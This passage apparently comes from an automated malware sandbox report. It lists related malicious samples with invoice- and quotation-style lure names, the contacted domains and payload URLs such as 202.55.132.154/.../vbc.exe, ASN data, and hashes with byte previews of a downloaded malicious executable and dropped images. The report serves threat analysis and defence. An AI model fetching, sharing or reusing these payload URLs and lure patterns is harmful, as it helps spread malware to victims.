                                    • www.teslabotnews.com/b3n1/?6lP=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6DJWZpG9FVC6&3f0pfr=Kl08lv
                                    Sales Agreement 17-11-21.docGet hashmaliciousBrowse
                                    • www.primetimeexpress.com/unzn/?y484Hx=-ZBHbB&ADH05pfH=MJyeuj/2LKgxhmwBEaOepQoT7p7qWMZxszA12ONlFtrFds1veJHUTtJAiK7RWXKTq53B3g==
                                    WvXgppXywm.exeGet hashmaliciousBrowse
                                    • www.toylandmetaverse.com/fl9w/?5j=v1AeKWlaHX6Eq72DF41G94UNV/NYDSuRplsWHrwN6To9EelRczKlltUWTrACum/yoB9ljSCjWA==&h8U4C=6llpd2Bh-
                                    Payment Copy.exeGet hashmaliciousBrowse
                                    • www.teslabotnews.com/b3n1/?yT64XD=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6Al/ap6FM23sDVnWfA==&3fHX7=FRihe
                                    PaymentCopy.exeGet hashmaliciousBrowse
                                    • www.teslabotnews.com/b3n1/?3f2xVxJp=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6ApGWIWFbwr9&5jwDp=L6AxwpFhVl
                                    Order 2021-822.lzhGet hashmaliciousBrowse
                                    • www.facebookfrommeta.com/eg62/?bZ8x3p=OV0lMEyKFd8jUreu4bi0Rr4kVRCFjgRe9oHLF6Mu/RQip7pQWlFSy5baU8mChkjx4bva&9rmL=2dTD-rk0Sn
                                    Enquiry docs_001.xlsxGet hashmaliciousBrowse
                                    • www.seattleinsurancebrokers.com/ga6b/?5j=A0D4KLkh&f6AtFb8=oGgLDSe9xOlB5GlDtwDzpX4pln6O05SLUMzRMDF+wYBaw1FiV59KxrRNiVTogSR6a0FYWg==
                                    Ekol_LOG_00914,pdf.exeGet hashmaliciousBrowse
                                    • www.crushanxiety.com/dgt9/?bH=DN9ti628iJ60&j4=12y/kml0JY96G501vbo19U/0atRochhfLWLJv6r29D8zD012Da+Wo+tthAajWN1QtyKepmajXA==
                                    n14Gz5Qjcb.exeGet hashmaliciousBrowse
                                    • www.seniordatingtv.com/m0np/?j6782P=EZM4Hn6&9rjPn6YP=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOHojoIO06SWV
                                    Order778.exeGet hashmaliciousBrowse
                                    • www.thatswhatshesays.com/qtqq/?Blm8j=f/FZiUyvdsuqwIBAgZIX9WKLQRzMOkEyandyJXo4F5lwu5RDUoyQAcRbAjtv9ea26I2c&d2J41F=NR-H4
                                    RgproFrlyA.exeGet hashmaliciousBrowse
                                    • www.seniordatingtv.com/m0np/?UxlT9j=6lJxR8&ibh=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOEIznpeMk3/S
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • www.shanghaiinvestments.com/dbew/?0B=ZHEP+6Sbwud2o6WPXQGcD07+3wwAURWE880vqsTElQTjXjhbwYnDXrL09FYjjtKpss2J&F2Jl=pVbXcXHhznF
                                    ocJJiP3R3A.exeGet hashmaliciousBrowse
                                    • www.seniordatingtv.com/m0np/?1bvd-4=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOEIZ4ZuMg13S&u0Dh=E2MDa2W
                                    GvrY83cA2d.exeGet hashmaliciousBrowse
                                    • www.inteleflow.com/bckt/?4hJDF=fxU5WiEsw2pXQ8uTQlBJiUCTUYmTeFKNjZblV7MbpGmpAyjjGOXWfttsCZUwbu6D8RjV&w48lT8=6loHNvhx9TdHUd0
                                    Quotation...exeGet hashmaliciousBrowse
                                    • www.safbox.com/qb4a/?s2MPPpM=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1qLWWV1UPmz7&iF=7n3dzFOPzb6dZjL
                                    purchase order_8019.exeGet hashmaliciousBrowse
                                    • www.safbox.com/qb4a/?TL3D=FrgLUJvHzHA4&V48DtRqP=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1prGZ0lsRDa8
                                    PURCHASE ORDER...exeGet hashmaliciousBrowse
                                    • www.safbox.com/qb4a/?kZAtl=3fNTnDv&Y2J=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1qL8JlFULk77
                                    CTM_50,000.exeGet hashmaliciousBrowse
                                    • www.buyspygear.com/eca0/?fL08q=zY4pfOeDeO/4cMsab5ROCLy9IlZvLYQaYwu3Wi3iIrICY2pboEoqtMc4wIaZ15ginwXROy0c0Q==&m2=-ZVD
                                    gqdJ6f9axq.exeGet hashmaliciousBrowse
                                    • www.zwq.xyz/wufn/?f8TPbh=XjXBhjUXVwqHNoI6l7gvZZ0GeOD10IACqOaYHXXfcnXXr5FIeGn5Pi6ag2sKCKjwblNQsnhuYg==&mVEhB=4hPxHDz
                                    yAm5YrRQhy.exeGet hashmaliciousBrowse
                                    • www.telehood.com/ons5/?TfoP=H8HXnZyeypkxdZWjx93+goBuntysNdud/1pYfiy9imFYwHStf/ZC3J9TIxLN5tUW2H7n&8pFPh=EJBl8lT8vxY0u
                                    202.55.132.154Payment.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/4267111111_2/vbc.exe
                                    RFQ.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/76190111111_1/vbc.exe
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/2290nw/vbc.exe
                                    Quote.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/2290nw/vbc.exe
                                    Quotation123 19.11.21.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/48680c/vbc.exe
                                    Shipping Document.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/x386w/vbc.exe
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/66w880/vbc.exe
                                    RFQ - R000001095.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/w7h009/vbc.exe
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/explorer10/vbc.exe

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    DOSARRESTUSScanPIX.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Sales Agreement 17-11-21.docGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    WvXgppXywm.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Payment Copy.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    PaymentCopy.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Order 2021-822.lzhGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Enquiry docs_001.xlsxGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Ekol_LOG_00914,pdf.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    n14Gz5Qjcb.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Order778.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    RgproFrlyA.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    ocJJiP3R3A.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    PO9887655.exeGet hashmaliciousBrowse
                                    • 52.128.23.27
                                    eVpu3gcOqTGet hashmaliciousBrowse
                                    • 70.33.253.205
                                    GvrY83cA2d.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    b3astmode.armGet hashmaliciousBrowse
                                    • 69.172.202.200
                                    Quotation...exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    purchase order_8019.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    PURCHASE ORDER...exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    ADTEC-AS-VNADTECMediaJointStockCompanyVNPayment.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Product Offerety44663573.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.101
                                    Offerta Ordine765746648.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.101
                                    RFQ.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Quote.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    Quotation123 19.11.21.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    FA1bgAzG2b.exeGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    fras comisiones.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    Shipping Document.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    WpCifE44PS.exeGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    vPoecWLHxD.exeGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    justificantes anticipos.xlsxGet hashmaliciousBrowse
                                    • 202.55.133.118
                                    RFQ _161121.xlsxGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154
                                    CTM REQ.xlsxGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    MV OCEANLADY.docxGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    invoice_34567445556.wbkGet hashmaliciousBrowse
                                    • 202.55.135.190
                                    PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                    • 202.55.134.54
                                    RFQ - R000001095.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:downloaded
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Reputation:low
                                    IE Cache URL:http://202.55.132.154/384500000_1/vbc.exe
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..a..............0.............~.... ... ....@.. .......................`............@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H........H...!..........\j...............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23212CB0.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):68702
                                    Entropy (8bit):7.960564589117156
                                    Encrypted:false
                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B038AAB.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):42465
                                    Entropy (8bit):7.979580180885764
                                    Encrypted:false
                                    SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                    MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                    SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                    SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                    SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37582CD5.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):6364
                                    Entropy (8bit):7.935202367366306
                                    Encrypted:false
                                    SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                    MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                    SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                    SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                    SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                    Malicious:false
                                    Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAC3DEF.emf
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                    Category:dropped
                                    Size (bytes):498420
                                    Entropy (8bit):0.6413939525004806
                                    Encrypted:false
                                    SSDEEP:384:0JXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:0JXwBkNWZ3cjvmWa+VDO
                                    MD5:883A0909725C3877917457D6650A7419
                                    SHA1:655EB1BCBC14145E8D6C49CF674EC6AB1EF99BB1
                                    SHA-256:5B0DBAE8314EEF7EC3EC75553423735EEBA87A894A21220E46FB4494BAEF0E22
                                    SHA-512:8938B351F688B0AEF72C0771B150711E5BFBE31B9D69D0ECED56F14A53090F150368033C7FF356045ADA807BC427B1335EB471693B6B063A19E1FEBE54C688AC
                                    Malicious:false
                                    Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...@.o..f.Y.@".%.....o.`.o.......o.D.o.RQ>[..o...o.....,.o...o.$Q>[..o...o. ...Id.Y..o...o. .........t..d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........P.o.X.....o...o..8.Y......t.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\522424D2.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):10202
                                    Entropy (8bit):7.870143202588524
                                    Encrypted:false
                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                    Malicious:false
                                    Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DAD64F1.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):14828
                                    Entropy (8bit):7.9434227607871355
                                    Encrypted:false
                                    SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                    MD5:58DD6AF7C438B638A88D107CC87009C7
                                    SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                    SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                    SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77C35F24.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):11303
                                    Entropy (8bit):7.909402464702408
                                    Encrypted:false
                                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                    Malicious:false
                                    Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7ACF70CD.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):10202
                                    Entropy (8bit):7.870143202588524
                                    Encrypted:false
                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                    Malicious:false
                                    Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC7AC69.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):19408
                                    Entropy (8bit):7.931403681362504
                                    Encrypted:false
                                    SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                    MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                    SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                    SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                    SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                    Malicious:false
